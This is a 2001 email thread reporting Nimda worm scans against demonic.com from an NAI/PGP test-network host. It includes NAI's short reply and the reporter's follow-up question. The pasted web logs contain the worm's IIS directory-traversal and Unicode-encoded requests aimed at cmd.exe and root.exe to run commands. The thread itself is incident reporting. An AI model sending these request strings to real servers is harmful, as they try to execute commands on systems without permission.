The following is an e-mail thread between me and PGP after receiving NIMBA signature attacks against demonic.com. The last mail i sent was never responded to.
From: jericho@demonic.com
To: hostmaster@NAI.COM, postmaster@pgp.com, pr@NAI.COM, security@NAI.COM,
security@pgp.com
Date: Sat, 27 Oct 2001 23:21:29 -0600 (MDT)
Subject: security incident at pgp.com or malicious activity
We received the following hits to demonic.com today. These are typically
the signature of the Nimda worm I believe (reference:
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209).
So I'm curious given the nature of your site..
Is a TIS/PGP host infected with Nimda?
If so, was this oversight on your staff's part? Or did a worm get loose on
your network during testing?
I'm wracking my brain here trying to come up with a valid reason that
a TIS owned IP would be scanning us like this..
Trusted Information Systems (NET-TIS-NET-155) TIS-NET-155
204.254.155.0 - 204.254.155.255
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:56 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
From: IT Security (IT_Security@NAI.com) To: "'jericho@demonic.com'" (jericho@demonic.com) Date: Tue, 30 Oct 2001 16:30:55 -0600 Subject: RE: security incident at pgp.com or malicious activity Thank you for bringing this to our attention. This network is part of a development and test network in one of our Engineering facilities. The host has now been removed from public access. Thanks again. IT Security.
From: jericho@demonic.com To: IT Security (IT_Security@NAI.com) Date: Tue, 30 Oct 2001 21:07:37 -0700 (MST) Subject: RE: security incident at pgp.com or malicious activity : Thank you for bringing this to our attention. : : This network is part of a development and test network in one of our : Engineering facilities. The host has now been removed from public : access. Would you care to comment why a test machine (presumeably for internal testing) was network connected and left unchecked so as to allow it to attack other machines?